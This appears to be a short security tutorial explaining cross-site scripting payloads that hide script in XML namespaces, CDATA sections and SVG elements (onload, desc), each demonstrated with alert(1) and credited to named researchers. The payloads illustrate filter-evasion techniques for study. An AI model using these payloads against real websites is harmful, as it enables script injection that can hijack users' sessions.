Thanks to: @pentest_swissky, @signalchaos, @itsecurityguard, @mickeyc
Follow me on https://twitter.com/si9int to stay updated!
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>
xmlns is the XML name-space, something the prefix for the name-space (to avoid name conflicts with other XML fragments).
<name> <value><![CDATA[<script>alert(1)</script>]]></value> </name>
CDATA stands for "Character Data" and means that included data (inside the tag) could but should not be interpreted as XML.
CDATA is part of the XML document, while a comment is not.
\<polygon> creates a graphic which contains at least three sides (0,0; 0,50; 50,0).
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
Again we can use the CDATA for embedding our payload "silently":
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></script> <desc> = isn't rendered part of the graphic and provides a description of any SVG element
@pentest_swissky, @signalchaos, @itsecurityguard, @mickeyc